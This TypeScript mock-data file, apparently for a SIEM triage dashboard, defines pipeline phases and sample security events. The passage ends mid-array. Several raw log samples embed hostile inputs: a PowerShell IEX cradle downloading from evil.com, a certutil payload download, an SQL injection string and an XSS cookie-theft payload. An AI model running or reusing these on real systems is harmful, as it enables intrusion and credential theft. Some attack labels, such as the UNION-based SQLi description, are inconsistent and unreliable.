export type ConnectorType = 'DPI' | 'NetFlow' | 'Syslog' | 'BytecodeWeaver' | 'CloudTrail' | 'EDR' | 'CCTV' | 'BadgeReader' | 'Firewall' | 'DNS' | 'DHCP' | 'WAF';

export interface FunnelPhase {
  id: number;
  name: string;
  shortName: string;
  description: string;
  color: string;
  activeEvents: number;
  droppedEvents: number;
  avgLatencyMs: number;
}

export interface FunnelEvent {
  id: string;
  connector: ConnectorType;
  sourceIP: string;
  destIP: string;
  timestamp: string;
  currentPhase: number;
  severity: 'info' | 'low' | 'medium' | 'high' | 'critical';
  eventType: string;
  rawData: string;
  protocol: string;
  port: number;
  bytes: number;
  isStructured: boolean;
  domain: 'logical' | 'physical';
  finalVerdict: 'pending' | 'benign' | 'suspicious' | 'threat' | 'critical_threat';
  resolutionReason: string;
}

export const FUNNEL_PHASES: FunnelPhase[] = [
  {
    id: 1,
    name: 'Ingestion',
    shortName: 'INGEST',
    description: 'Raw data collection from all connectors',
    color: '#d4a017',
    activeEvents: 14203,
    droppedEvents: 0,
    avgLatencyMs: 2,
  },
  {
    id: 2,
    name: 'Parse',
    shortName: 'PARSE',
    description: 'Protocol identification, header parsing, field extraction',
    color: '#e07b24',
    activeEvents: 13890,
    droppedEvents: 313,
    avgLatencyMs: 5,
  },
  {
    id: 3,
    name: 'Enrich',
    shortName: 'ENRICH',
    description: 'GeoIP, ASN, threat intel, asset context enrichment',
    color: '#2aa198',
    activeEvents: 13450,
    droppedEvents: 440,
    avgLatencyMs: 15,
  },
  {
    id: 4,
    name: 'Correlate',
    shortName: 'CORRELATE',
    description: 'Correlation rules and cross-source pattern matching',
    color: '#0ea5e9',
    activeEvents: 11200,
    droppedEvents: 2250,
    avgLatencyMs: 22,
  },
  {
    id: 5,
    name: 'Triage',
    shortName: 'TRIAGE',
    description: 'Six-factor scoring: severity + risk + volume + IOC match + repeat offender + temporal anomaly',
    color: '#ef6c4a',
    activeEvents: 4820,
    droppedEvents: 6380,
    avgLatencyMs: 12,
  },
  {
    id: 6,
    name: 'Deep Enrich',
    shortName: 'DEEP ENRICH',
    description: 'Graph evidence 60%, vector similarity 15%, CTI match 10%, historical memory 15%',
    color: '#3b82f6',
    activeEvents: 2340,
    droppedEvents: 2480,
    avgLatencyMs: 45,
  },
  {
    id: 7,
    name: 'Investigate',
    shortName: 'INVESTIGATE',
    description: 'Automated investigation, evidence collection, timeline reconstruction',
    color: '#06b6d4',
    activeEvents: 2340,
    droppedEvents: 0,
    avgLatencyMs: 35,
  },
  {
    id: 8,
    name: 'Respond',
    shortName: 'RESPOND',
    description: 'Automated response actions, containment, and isolation',
    color: '#059669',
    activeEvents: 1180,
    droppedEvents: 1160,
    avgLatencyMs: 18,
  },
  {
    id: 9,
    name: 'Discover',
    shortName: 'DISCOVER',
    description: 'Pattern discovery, new threat identification, anomaly clustering',
    color: '#0891b2',
    activeEvents: 487,
    droppedEvents: 693,
    avgLatencyMs: 25,
  },
  {
    id: 10,
    name: 'Vector Augmented Scoring',
    shortName: 'VECTOR',
    description: '+30% confidence uplift, up to -50% false-positive suppression',
    color: '#d97706',
    activeEvents: 344,
    droppedEvents: 143,
    avgLatencyMs: 8,
  },
  {
    id: 11,
    name: 'Analyst Learning & Human Feedback',
    shortName: 'ALHF',
    description: 'ALHF raises or lowers thresholds based on FP/FN and 7-day vs 14-day drift',
    color: '#ef4444',
    activeEvents: 142,
    droppedEvents: 202,
    avgLatencyMs: 4,
  },
];

export const CONNECTOR_META: Record<ConnectorType, { label: string; domain: 'logical' | 'physical' | 'both'; structured: boolean; color: string }> = {
  DPI: { label: 'Deep Packet Inspection', domain: 'logical', structured: true, color: '#22d3ee' },
  NetFlow: { label: 'NetFlow v9/IPFIX', domain: 'logical', structured: true, color: '#06b6d4' },
  Syslog: { label: 'Syslog/rsyslog', domain: 'logical', structured: false, color: '#0ea5e9' },
  BytecodeWeaver: { label: 'Bytecode Weaver Agent', domain: 'logical', structured: true, color: '#3b82f6' },
  CloudTrail: { label: 'AWS CloudTrail', domain: 'logical', structured: true, color: '#0891b2' },
  EDR: { label: 'Endpoint Detection', domain: 'logical', structured: true, color: '#059669' },
  CCTV: { label: 'CCTV Analytics', domain: 'physical', structured: false, color: '#eab308' },
  BadgeReader: { label: 'Badge Access Control', domain: 'physical', structured: true, color: '#f97316' },
  Firewall: { label: 'Next-Gen Firewall', domain: 'logical', structured: true, color: '#ef4444' },
  DNS: { label: 'DNS Query Logs', domain: 'logical', structured: true, color: '#14b8a6' },
  DHCP: { label: 'DHCP Lease Logs', domain: 'logical', structured: true, color: '#0ea5e9' },
  WAF: { label: 'Web App Firewall', domain: 'logical', structured: true, color: '#dc2626' },
};

export const MOCK_EVENTS: FunnelEvent[] = [
  {
    id: 'EVT-0001',
    connector: 'DPI',
    sourceIP: '10.0.5.107',
    destIP: '185.93.2.71',
    timestamp: '2024-12-15T14:32:47.123Z',
    currentPhase: 9,
    severity: 'high',
    eventType: 'C2 Beacon',
    rawData: '{"proto":"TCP","src":"10.0.5.107","dst":"185.93.2.71","payload_hash":"a3f7b2c9e1d4","flags":"SYN,ACK","ja3":"e7d705a3286e"}',
    protocol: 'TCP',
    port: 443,
    bytes: 1284,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'threat',
    resolutionReason: 'JA3 fingerprint e7d705a3286e matches known Cobalt Strike beacon profile; 10.0.5.107 initiated periodic callbacks to 185.93.2.71 on 443/TCP with fixed interval jitter consistent with C2 heartbeat',
  },
  {
    id: 'EVT-0002',
    connector: 'NetFlow',
    sourceIP: '10.0.1.44',
    destIP: '203.0.113.15',
    timestamp: '2024-12-15T14:32:48.456Z',
    currentPhase: 6,
    severity: 'medium',
    eventType: 'Data Exfil',
    rawData: '{"src_addr":"10.0.1.44","dst_addr":"203.0.113.15","bytes":24891,"packets":147,"flow_duration":12.4}',
    protocol: 'TCP',
    port: 443,
    bytes: 24891,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'suspicious',
    resolutionReason: 'NetFlow from 10.0.1.44 shows 24891 bytes exfiltrated to 203.0.113.15 over 12.4s; volume 4x baseline for this host; destination IP in unregistered ASN with no prior communication history',
  },
  {
    id: 'EVT-0003',
    connector: 'Syslog',
    sourceIP: '185.220.101.4',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:32:49.789Z',
    currentPhase: 3,
    severity: 'low',
    eventType: 'Port Scan',
    rawData: '<134>Dec 15 14:32:47 fw-edge-01 kernel: [UFW BLOCK] IN=eth0 SRC=185.220.101.4 DST=10.0.0.1 PROTO=TCP DPT=443',
    protocol: 'TCP',
    port: 443,
    bytes: 64,
    isStructured: false,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'Inbound SYN from known Tor exit node 185.220.101.4 blocked by UFW on eth0; single port probe on 443/TCP awaiting enrichment with threat intel feed correlation',
  },
  {
    id: 'EVT-0004',
    connector: 'BytecodeWeaver',
    sourceIP: '10.0.3.88',
    destIP: '10.0.3.88',
    timestamp: '2024-12-15T14:32:50.112Z',
    currentPhase: 10,
    severity: 'critical',
    eventType: 'Process Injection',
    rawData: '{"agent":"BWv3.2","pid":4821,"process":"chrome.exe","injection_type":"reflective_dll","target_pid":892,"confidence":0.94}',
    protocol: 'TCP',
    port: 445,
    bytes: 8192,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'critical_threat',
    resolutionReason: 'BytecodeWeaver agent detected reflective DLL injection from chrome.exe (PID 4821) into PID 892 with 0.94 confidence; technique matches MITRE T1055.001; host 10.0.3.88 already flagged in active incident IR-2024-0847',
  },
  {
    id: 'EVT-0005',
    connector: 'CloudTrail',
    sourceIP: '198.51.100.23',
    destIP: '10.0.0.5',
    timestamp: '2024-12-15T14:32:51.334Z',
    currentPhase: 7,
    severity: 'high',
    eventType: 'Privilege Escalation',
    rawData: '{"eventName":"AssumeRole","userIdentity":{"arn":"arn:aws:iam::123456789:user/suspicious-actor"},"sourceIP":"198.51.100.23"}',
    protocol: 'HTTPS',
    port: 443,
    bytes: 2048,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'suspicious',
    resolutionReason: 'AssumeRole call from external IP 198.51.100.23 targeting admin role on account 123456789; source IP not in approved CIDR range; user suspicious-actor has no prior legitimate access pattern',
  },
  {
    id: 'EVT-0006',
    connector: 'EDR',
    sourceIP: '10.0.4.42',
    destIP: '91.215.85.12',
    timestamp: '2024-12-15T14:32:52.567Z',
    currentPhase: 11,
    severity: 'critical',
    eventType: 'Malware Download',
    rawData: '{"host":"WKS-FIN-042","process":"powershell.exe","commandLine":"IEX(New-Object Net.WebClient).DownloadString(\'http://evil.com/s.ps1\')","detection":"AMSI_BYPASS"}',
    protocol: 'HTTP',
    port: 80,
    bytes: 34567,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'critical_threat',
    resolutionReason: 'AMSI bypass detected on WKS-FIN-042; powershell.exe executing IEX cradle downloading remote payload from evil.com; ALHF confirmed true positive after analyst review; host isolated per playbook PB-MAL-003',
  },
  {
    id: 'EVT-0007',
    connector: 'CCTV',
    sourceIP: '10.0.10.7',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:32:53.890Z',
    currentPhase: 8,
    severity: 'high',
    eventType: 'Motion Alert',
    rawData: 'MOTION_ALERT zone=SERVER_ROOM_A camera=CAM-DC-07 confidence=0.89 face_match=UNAUTHORIZED timestamp=2024-12-15T14:32:47Z',
    protocol: 'UDP',
    port: 8443,
    bytes: 512,
    isStructured: false,
    domain: 'physical',
    finalVerdict: 'suspicious',
    resolutionReason: 'CCTV CAM-DC-07 detected unauthorized face in SERVER_ROOM_A at 0.89 confidence; no corresponding badge scan within 60s window; automated containment triggered door lock on zone access points',
  },
  {
    id: 'EVT-0008',
    connector: 'BadgeReader',
    sourceIP: '10.0.10.20',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:32:54.123Z',
    currentPhase: 9,
    severity: 'high',
    eventType: 'Unauthorized Access',
    rawData: '{"reader_id":"DOOR-SR-01","badge_id":"EMP-7842","employee":"John.Mitchell","access":"DENIED","reason":"expired_clearance","zone":"RESTRICTED"}',
    protocol: 'TCP',
    port: 8080,
    bytes: 256,
    isStructured: true,
    domain: 'physical',
    finalVerdict: 'threat',
    resolutionReason: 'Badge EMP-7842 (John.Mitchell) denied at DOOR-SR-01 RESTRICTED zone due to expired clearance; employee clearance lapsed 2024-11-30; 3 consecutive denied attempts in 5 minutes indicates intent to bypass physical access control',
  },
  {
    id: 'EVT-0009',
    connector: 'Firewall',
    sourceIP: '10.0.5.107',
    destIP: '185.93.2.71',
    timestamp: '2024-12-15T14:32:55.456Z',
    currentPhase: 10,
    severity: 'critical',
    eventType: 'C2 Beacon',
    rawData: '{"action":"BLOCK","rule":"APT_C2_DETECT","src":"10.0.5.107","dst":"185.93.2.71","app":"ssl","threat_id":"CVE-2024-3094"}',
    protocol: 'TCP',
    port: 443,
    bytes: 1024,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'threat',
    resolutionReason: 'Firewall rule APT_C2_DETECT triggered on same src/dst pair as EVT-0001; CVE-2024-3094 exploit signature matched; 10.0.5.107 confirmed compromised host with active C2 channel to 185.93.2.71',
  },
  {
    id: 'EVT-0010',
    connector: 'DNS',
    sourceIP: '10.0.5.107',
    destIP: '10.0.0.2',
    timestamp: '2024-12-15T14:32:56.789Z',
    currentPhase: 7,
    severity: 'medium',
    eventType: 'DNS Tunneling',
    rawData: '{"query":"a3q3x.evil-domain.xyz","type":"TXT","response":"NXDOMAIN","client":"10.0.5.107","flags":"QR,RD","entropy":4.82}',
    protocol: 'DNS',
    port: 53,
    bytes: 128,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'suspicious',
    resolutionReason: 'DNS query entropy 4.82 for a3q3x.evil-domain.xyz exceeds tunneling threshold of 3.5; subdomain pattern consistent with DNS-over-TXT exfiltration; origin host 10.0.5.107 already linked to C2 activity in EVT-0001',
  },
  {
    id: 'EVT-0011',
    connector: 'DHCP',
    sourceIP: '10.0.5.220',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:32:57.012Z',
    currentPhase: 4,
    severity: 'info',
    eventType: 'Rogue Device',
    rawData: '{"msg_type":"DHCPACK","client_mac":"aa:bb:cc:dd:ee:ff","assigned_ip":"10.0.5.220","hostname":"UNKNOWN-DEVICE","lease":3600}',
    protocol: 'UDP',
    port: 67,
    bytes: 300,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'DHCP lease assigned to unknown MAC aa:bb:cc:dd:ee:ff with hostname UNKNOWN-DEVICE on 10.0.5.220; MAC OUI not in approved vendor list; awaiting NAC posture assessment and asset inventory correlation',
  },
  {
    id: 'EVT-0012',
    connector: 'WAF',
    sourceIP: '203.0.113.77',
    destIP: '10.0.2.10',
    timestamp: '2024-12-15T14:32:58.345Z',
    currentPhase: 8,
    severity: 'high',
    eventType: 'SQL Injection',
    rawData: '{"rule_id":"942100","attack":"SQL Injection","uri":"/api/v2/users?id=1\' OR 1=1--","client":"203.0.113.77","action":"BLOCKED","score":95}',
    protocol: 'HTTPS',
    port: 443,
    bytes: 892,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'threat',
    resolutionReason: 'WAF rule 942100 blocked SQL injection on /api/v2/users from 203.0.113.77; attack score 95/100; UNION-based injection with boolean blind technique; source IP linked to 12 prior SQLi attempts across 3 applications',
  },
  {
    id: 'EVT-0013',
    connector: 'DPI',
    sourceIP: '10.0.2.15',
    destIP: '104.26.10.78',
    timestamp: '2024-12-15T14:33:01.234Z',
    currentPhase: 2,
    severity: 'info',
    eventType: 'HTTPS Session',
    rawData: '{"proto":"TCP","src":"10.0.2.15","dst":"104.26.10.78","payload_hash":"b8c2e4f1a390","flags":"PSH,ACK","ja3":"cd08e31494f9"}',
    protocol: 'TCP',
    port: 443,
    bytes: 3456,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'Standard HTTPS session from 10.0.2.15 to Cloudflare CDN 104.26.10.78; JA3 cd08e31494f9 matches Chrome browser profile; certificate chain valid; traffic volume within normal business hours baseline',
  },
  {
    id: 'EVT-0014',
    connector: 'NetFlow',
    sourceIP: '10.0.3.22',
    destIP: '10.0.3.50',
    timestamp: '2024-12-15T14:33:02.567Z',
    currentPhase: 5,
    severity: 'low',
    eventType: 'Lateral Movement',
    rawData: '{"src_addr":"10.0.3.22","dst_addr":"10.0.3.50","bytes":189432,"packets":1204,"flow_duration":45.7}',
    protocol: 'SMB',
    port: 445,
    bytes: 189432,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'SMB lateral movement from 10.0.3.22 to 10.0.3.50 with 189KB transferred over 45.7s; unusual inter-subnet SMB traffic; awaiting triage scoring for repeat-offender and temporal anomaly factors',
  },
  {
    id: 'EVT-0015',
    connector: 'Syslog',
    sourceIP: '45.33.32.156',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:03.890Z',
    currentPhase: 1,
    severity: 'low',
    eventType: 'Brute Force',
    rawData: '<86>Dec 15 14:33:03 auth-gw sshd[12847]: Failed password for root from 45.33.32.156 port 54812 ssh2',
    protocol: 'TCP',
    port: 22,
    bytes: 96,
    isStructured: false,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'SSH brute force attempt from 45.33.32.156 targeting root account on auth-gw; single failed attempt ingested; awaiting correlation with additional login failures to determine attack scope',
  },
  {
    id: 'EVT-0016',
    connector: 'Syslog',
    sourceIP: '45.33.32.156',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:04.123Z',
    currentPhase: 1,
    severity: 'low',
    eventType: 'Brute Force',
    rawData: '<86>Dec 15 14:33:04 auth-gw sshd[12847]: Failed password for admin from 45.33.32.156 port 54813 ssh2',
    protocol: 'TCP',
    port: 22,
    bytes: 96,
    isStructured: false,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'Second SSH brute force from same source 45.33.32.156 now targeting admin account; sequential port increment (54812->54813) indicates automated credential stuffing tool; awaiting correlation window completion',
  },
  {
    id: 'EVT-0017',
    connector: 'BytecodeWeaver',
    sourceIP: '10.0.4.101',
    destIP: '10.0.4.101',
    timestamp: '2024-12-15T14:33:05.456Z',
    currentPhase: 6,
    severity: 'medium',
    eventType: 'Credential Dump',
    rawData: '{"agent":"BWv3.2","pid":7712,"process":"lsass.exe","injection_type":"process_hollowing","target_pid":1204,"confidence":0.87}',
    protocol: 'TCP',
    port: 445,
    bytes: 4096,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'suspicious',
    resolutionReason: 'BytecodeWeaver detected process hollowing of lsass.exe (PID 7712) targeting PID 1204 at 0.87 confidence; technique consistent with credential harvesting (MITRE T1003.001); deep enrichment pending for memory forensics',
  },
  {
    id: 'EVT-0018',
    connector: 'CloudTrail',
    sourceIP: '10.0.1.5',
    destIP: '10.0.0.5',
    timestamp: '2024-12-15T14:33:06.789Z',
    currentPhase: 3,
    severity: 'info',
    eventType: 'IAM Change',
    rawData: '{"eventName":"CreateAccessKey","userIdentity":{"arn":"arn:aws:iam::123456789:user/dev-ops-lead"},"sourceIP":"10.0.1.5"}',
    protocol: 'HTTPS',
    port: 443,
    bytes: 1536,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'CloudTrail CreateAccessKey by dev-ops-lead from internal IP 10.0.1.5; user is authorized IAM admin; action matches scheduled key rotation policy; no anomalous API calls in surrounding 15-minute window',
  },
  {
    id: 'EVT-0019',
    connector: 'EDR',
    sourceIP: '10.0.4.55',
    destIP: '10.0.4.55',
    timestamp: '2024-12-15T14:33:07.012Z',
    currentPhase: 5,
    severity: 'low',
    eventType: 'Suspicious Process',
    rawData: '{"host":"WKS-HR-019","process":"certutil.exe","commandLine":"certutil -urlcache -split -f http://192.168.1.100/payload.bin","detection":"LOLBin_USAGE"}',
    protocol: 'HTTP',
    port: 80,
    bytes: 15234,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'Certutil LOLBin usage on WKS-HR-019 downloading payload.bin from internal IP 192.168.1.100; certutil -urlcache -split technique is MITRE T1105; awaiting triage to determine if source IP is legitimate staging server',
  },
  {
    id: 'EVT-0020',
    connector: 'CCTV',
    sourceIP: '10.0.10.12',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:08.345Z',
    currentPhase: 4,
    severity: 'medium',
    eventType: 'Tailgating',
    rawData: 'TAILGATE_DETECT zone=MAIN_ENTRANCE camera=CAM-LOBBY-02 persons_detected=2 badges_scanned=1 confidence=0.92 timestamp=2024-12-15T14:33:08Z',
    protocol: 'UDP',
    port: 8443,
    bytes: 480,
    isStructured: false,
    domain: 'physical',
    finalVerdict: 'pending',
    resolutionReason: 'CCTV CAM-LOBBY-02 detected 2 persons entering with only 1 badge scan at MAIN_ENTRANCE; tailgating confidence 0.92; awaiting correlation with badge reader logs to identify unauthorized individual',
  },
  {
    id: 'EVT-0021',
    connector: 'BadgeReader',
    sourceIP: '10.0.10.25',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:09.678Z',
    currentPhase: 6,
    severity: 'medium',
    eventType: 'Badge Anomaly',
    rawData: '{"reader_id":"DOOR-DC-03","badge_id":"EMP-3291","employee":"Sarah.Chen","access":"GRANTED","reason":"valid_clearance","zone":"DATA_CENTER","after_hours":true}',
    protocol: 'TCP',
    port: 8080,
    bytes: 320,
    isStructured: true,
    domain: 'physical',
    finalVerdict: 'pending',
    resolutionReason: 'Badge EMP-3291 (Sarah.Chen) granted access to DATA_CENTER via DOOR-DC-03 during after-hours; employee has valid clearance but access time deviates from 90-day behavioral baseline; deep enrichment running temporal anomaly scoring',
  },
  {
    id: 'EVT-0022',
    connector: 'Firewall',
    sourceIP: '192.0.2.100',
    destIP: '10.0.2.10',
    timestamp: '2024-12-15T14:33:10.901Z',
    currentPhase: 3,
    severity: 'info',
    eventType: 'DDoS Fragment',
    rawData: '{"action":"DROP","rule":"RATE_LIMIT_EXCEED","src":"192.0.2.100","dst":"10.0.2.10","app":"http","rate":"15000pps"}',
    protocol: 'TCP',
    port: 80,
    bytes: 64,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'Firewall dropped inbound traffic from 192.0.2.100 at 15000 pps exceeding rate limit threshold; DDoS fragment pattern detected; awaiting enrichment with upstream ISP flow data and BGP anomaly correlation',
  },
  {
    id: 'EVT-0023',
    connector: 'DNS',
    sourceIP: '10.0.3.88',
    destIP: '10.0.0.2',
    timestamp: '2024-12-15T14:33:11.234Z',
    currentPhase: 2,
    severity: 'info',
    eventType: 'DNS Query',
    rawData: '{"query":"update.microsoft.com","type":"A","response":"20.190.160.14","client":"10.0.3.88","flags":"QR,RD,RA","entropy":2.31}',
    protocol: 'DNS',
    port: 53,
    bytes: 72,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'DNS A-record query for update.microsoft.com from 10.0.3.88 resolved to known Microsoft IP 20.190.160.14; entropy 2.31 well below tunneling threshold; matches scheduled Windows Update check pattern',
  },
  {
    id: 'EVT-0024',
    connector: 'DHCP',
    sourceIP: '10.0.6.180',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:12.567Z',
    currentPhase: 1,
    severity: 'info',
    eventType: 'Lease Renewal',
    rawData: '{"msg_type":"DHCPREQUEST","client_mac":"11:22:33:44:55:66","assigned_ip":"10.0.6.180","hostname":"WKS-MKT-007","lease":7200}',
    protocol: 'UDP',
    port: 67,
    bytes: 284,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'Standard DHCP lease renewal for WKS-MKT-007 (MAC 11:22:33:44:55:66) on 10.0.6.180; known corporate asset in CMDB; lease extension from 3600s to 7200s consistent with DHCP server policy',
  },
  {
    id: 'EVT-0025',
    connector: 'WAF',
    sourceIP: '198.51.100.44',
    destIP: '10.0.2.10',
    timestamp: '2024-12-15T14:33:13.890Z',
    currentPhase: 7,
    severity: 'medium',
    eventType: 'XSS Attempt',
    rawData: '{"rule_id":"941100","attack":"Cross-Site Scripting","uri":"/search?q=<script>document.cookie</script>","client":"198.51.100.44","action":"BLOCKED","score":78}',
    protocol: 'HTTPS',
    port: 443,
    bytes: 1456,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'suspicious',
    resolutionReason: 'WAF rule 941100 blocked reflected XSS via /search endpoint from 198.51.100.44; script tag injection targeting document.cookie; attack score 78/100; source IP has 5 prior WAF violations in last 24h',
  },
  {
    id: 'EVT-0026',
    connector: 'DPI',
    sourceIP: '10.0.5.107',
    destIP: '185.93.2.71',
    timestamp: '2024-12-15T14:33:14.123Z',
    currentPhase: 11,
    severity: 'critical',
    eventType: 'C2 Beacon',
    rawData: '{"proto":"TCP","src":"10.0.5.107","dst":"185.93.2.71","payload_hash":"c9d2f7e3b801","flags":"PSH,ACK","ja3":"e7d705a3286e"}',
    protocol: 'TCP',
    port: 443,
    bytes: 2048,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'critical_threat',
    resolutionReason: 'Persistent C2 beacon from 10.0.5.107 to 185.93.2.71 confirmed via DPI; identical JA3 e7d705a3286e as EVT-0001; PSH/ACK payload hash variant indicates active data staging; ALHF escalated to critical after cross-correlation with 4 related events',
  },
  {
    id: 'EVT-0027',
    connector: 'NetFlow',
    sourceIP: '10.0.1.44',
    destIP: '10.0.1.50',
    timestamp: '2024-12-15T14:33:15.456Z',
    currentPhase: 2,
    severity: 'info',
    eventType: 'Internal Traffic',
    rawData: '{"src_addr":"10.0.1.44","dst_addr":"10.0.1.50","bytes":5120,"packets":34,"flow_duration":2.1}',
    protocol: 'TCP',
    port: 8080,
    bytes: 5120,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'Routine internal NetFlow between 10.0.1.44 and 10.0.1.50 on port 8080; 5KB over 2.1s consistent with application health check; both IPs are registered application servers in same VLAN',
  },
  {
    id: 'EVT-0028',
    connector: 'Syslog',
    sourceIP: '10.0.0.1',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:16.789Z',
    currentPhase: 1,
    severity: 'info',
    eventType: 'System Log',
    rawData: '<30>Dec 15 14:33:16 core-sw-01 syslogd: logfile turned over due to size>512K',
    protocol: 'UDP',
    port: 514,
    bytes: 128,
    isStructured: false,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'Syslog rotation event from core-sw-01; logfile turned over at 512K size limit; standard syslogd housekeeping operation; no security relevance',
  },
  {
    id: 'EVT-0029',
    connector: 'Syslog',
    sourceIP: '10.0.7.30',
    destIP: '10.0.0.1',
    timestamp: '2024-12-15T14:33:17.012Z',
    currentPhase: 4,
    severity: 'medium',
    eventType: 'Firewall Drop',
    rawData: '<134>Dec 15 14:33:17 fw-dmz-02 kernel: [IPTABLES DROP] IN=eth1 SRC=172.16.0.55 DST=10.0.7.30 PROTO=TCP DPT=3389 SPT=49821',
    protocol: 'TCP',
    port: 3389,
    bytes: 64,
    isStructured: false,
    domain: 'logical',
    finalVerdict: 'pending',
    resolutionReason: 'Firewall DROP on RDP port 3389 from DMZ host 172.16.0.55 to internal 10.0.7.30; RDP from DMZ violates segmentation policy; awaiting correlation to determine if source host is compromised or misconfigured',
  },
  {
    id: 'EVT-0030',
    connector: 'BytecodeWeaver',
    sourceIP: '10.0.4.200',
    destIP: '10.0.4.200',
    timestamp: '2024-12-15T14:33:18.345Z',
    currentPhase: 8,
    severity: 'high',
    eventType: 'Memory Tampering',
    rawData: '{"agent":"BWv3.2","pid":2244,"process":"svchost.exe","injection_type":"apc_injection","target_pid":668,"confidence":0.91}',
    protocol: 'TCP',
    port: 445,
    bytes: 6144,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'threat',
    resolutionReason: 'BytecodeWeaver detected APC injection from svchost.exe (PID 2244) into PID 668 at 0.91 confidence; target PID is winlogon.exe; technique matches MITRE T1055.004; automated response isolated host 10.0.4.200 from network',
  },
  {
    id: 'EVT-0031',
    connector: 'CloudTrail',
    sourceIP: '203.0.113.200',
    destIP: '10.0.0.5',
    timestamp: '2024-12-15T14:33:19.678Z',
    currentPhase: 9,
    severity: 'high',
    eventType: 'Privilege Escalation',
    rawData: '{"eventName":"AttachRolePolicy","userIdentity":{"arn":"arn:aws:iam::123456789:user/compromised-svc"},"sourceIP":"203.0.113.200","policyArn":"arn:aws:iam::aws:policy/AdministratorAccess"}',
    protocol: 'HTTPS',
    port: 443,
    bytes: 2560,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'threat',
    resolutionReason: 'CloudTrail AttachRolePolicy granting AdministratorAccess to compromised-svc from external IP 203.0.113.200; policy escalation from read-only to full admin; source IP geolocated to non-corporate jurisdiction; service account has no change-management ticket',
  },
  {
    id: 'EVT-0032',
    connector: 'EDR',
    sourceIP: '10.0.4.78',
    destIP: '10.0.4.78',
    timestamp: '2024-12-15T14:33:20.901Z',
    currentPhase: 4,
    severity: 'info',
    eventType: 'Software Install',
    rawData: '{"host":"WKS-DEV-103","process":"msiexec.exe","commandLine":"msiexec /i vscode-setup.msi /quiet","detection":"LEGITIMATE_INSTALL"}',
    protocol: 'TCP',
    port: 443,
    bytes: 45000,
    isStructured: true,
    domain: 'logical',
    finalVerdict: 'benign',
    resolutionReason: 'Legitimate software installation on WKS-DEV-103; msiexec.exe running VS Code setup in quiet mode; installer hash matches known Microsoft signature; LEGITIMATE_INSTALL detection tag from EDR confirms approved software catalog entry',
  },
  {
    id: 'EVT-0033',
    connector: 'CCTV',
    sourceIP: '10.0.10.9',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:21.234Z',
    currentPhase: 5,
    severity: 'low',
    eventType: 'Motion Alert',
    rawData: 'MOTION_ALERT zone=PARKING_LOT_B camera=CAM-EXT-14 confidence=0.67 face_match=NONE vehicle_detect=true timestamp=2024-12-15T14:33:21Z',
    protocol: 'UDP',
    port: 8443,
    bytes: 496,
    isStructured: false,
    domain: 'physical',
    finalVerdict: 'benign',
    resolutionReason: 'CCTV motion alert in PARKING_LOT_B from CAM-EXT-14; vehicle detection positive but face match returned NONE; confidence 0.67 below actionable threshold; normal parking lot activity during business hours',
  },
  {
    id: 'EVT-0034',
    connector: 'CCTV',
    sourceIP: '10.0.10.8',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:22.567Z',
    currentPhase: 7,
    severity: 'high',
    eventType: 'Loitering Alert',
    rawData: 'LOITER_DETECT zone=SERVER_ROOM_B camera=CAM-DC-11 duration_sec=340 confidence=0.94 face_match=UNKNOWN timestamp=2024-12-15T14:33:22Z',
    protocol: 'UDP',
    port: 8443,
    bytes: 520,
    isStructured: false,
    domain: 'physical',
    finalVerdict: 'suspicious',
    resolutionReason: 'Unknown individual loitering 340 seconds in SERVER_ROOM_B detected by CAM-DC-11 at 0.94 confidence; face not matched in employee database; duration exceeds 120s threshold for restricted zones; investigation initiated for physical security breach',
  },
  {
    id: 'EVT-0035',
    connector: 'BadgeReader',
    sourceIP: '10.0.10.22',
    destIP: '10.0.10.1',
    timestamp: '2024-12-15T14:33:23.890Z',
    currentPhase: 3,
    severity: 'info',
    eventType: 'Badge Scan',
    rawData: '{"reader_id":"DOOR-MAIN-01","badge_id":"EMP-1024","employee":"Alice.Wong","access":"GRANTED","reason":"valid_clearance","zone":"LOBBY"}',
    protocol: 'TCP',
    port: 8080,
    bytes: 288,
    isStructured: true,
    domain: 'physical',
    finalVerdict: 'benign',
    resolutionReason: 'Routine badge scan for EMP-1024 (Alice.Wong) at DOOR-MAIN-01 LOBBY zone; valid clearance confirmed; access time within normal business hours; no anomalous access patterns in 30-day history',
  },
  {
